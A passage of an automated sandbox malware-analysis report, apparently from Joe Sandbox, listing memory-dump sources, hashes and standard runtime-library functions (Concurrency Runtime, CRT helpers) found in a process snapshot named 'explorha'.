                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                      • Opcode ID: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction ID: b05c6622cec164a70c840783034b95d437fbec275dcb87a659f4224268f2b486
                                                                                                      • Opcode Fuzzy Hash: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction Fuzzy Hash: 2201A577A04726692E143018AC026776798FBC3BB071D003EFC54F72C2EE94DC0141A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00881101 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00881196
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                      • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                      • API String ID: 348560076-465693683
                                                                                                      • Opcode ID: e6068b3e5bbc165384ecf56c991d6ae4f9cd2bedcf5173dd26b770ebf110666b
                                                                                                      • Instruction ID: 150ceb59709d733deda076487db3b38dace13ad0d0081c211ca2e01b91cb0cbd
                                                                                                      • Opcode Fuzzy Hash: e6068b3e5bbc165384ecf56c991d6ae4f9cd2bedcf5173dd26b770ebf110666b
                                                                                                      • Instruction Fuzzy Hash: D90128A95423056AAF20B3BD5C4EEFB36DCFE82654720153AF550E3342FE78E8014365
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00893724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • StructuredWorkStealingQueue.LIBCMT ref: 00893744
                                                                                                        • Part of subcall function 0088E183: Mailbox.LIBCMT ref: 0088E1BD
                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00893755
                                                                                                      • StructuredWorkStealingQueue.LIBCMT ref: 0089378B
                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0089379C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                      • String ID: e
                                                                                                      • API String ID: 1411586358-4024072794
                                                                                                      • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                      • Instruction ID: ab48f8f4ceecdd8e4c9290085cfa78c87b7d93466501b621404b09daea18f85d
                                                                                                      • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                      • Instruction Fuzzy Hash: 11114FB5100109BBDF55FEADC985A6B73A5FF41368B1C8179EC06CF202DA71EA058B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0087E6BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • kernel32.dll, xrefs: 0087E6E1
                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0087E6D0
                                                                                                      • SleepConditionVariableCS, xrefs: 0087E6F2
                                                                                                      • WakeAllConditionVariable, xrefs: 0087E6FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ___scrt_fastfail
                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                      • API String ID: 2964418898-3242537097
                                                                                                      • Opcode ID: 7adb8ce1e5bdbaf8628ded1b4fc187501dc31bdb90f26116660124ef470b0a71
                                                                                                      • Instruction ID: ee11d19a7a560f14a439507dfafbfda35a997b62870a7c119fdd3be60ba68a8a
                                                                                                      • Opcode Fuzzy Hash: 7adb8ce1e5bdbaf8628ded1b4fc187501dc31bdb90f26116660124ef470b0a71
                                                                                                      • Instruction Fuzzy Hash: 9F01D6616C675225E6346E391C05FAB12A8FFE6B98B009174F858E7384DAB4ED008AA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008A6234 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 008A62B8
                                                                                                      • __alloca_probe_16.LIBCMT ref: 008A637E
                                                                                                      • __freea.LIBCMT ref: 008A63EA
                                                                                                        • Part of subcall function 0089C66B: RtlAllocateHeap.NTDLL(00000000,00878247,?,?,0087EA91,00878247,?,0087911B,8B18EC84,04980A5A), ref: 0089C69E
                                                                                                      • __freea.LIBCMT ref: 008A63F3
                                                                                                      • __freea.LIBCMT ref: 008A6416
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
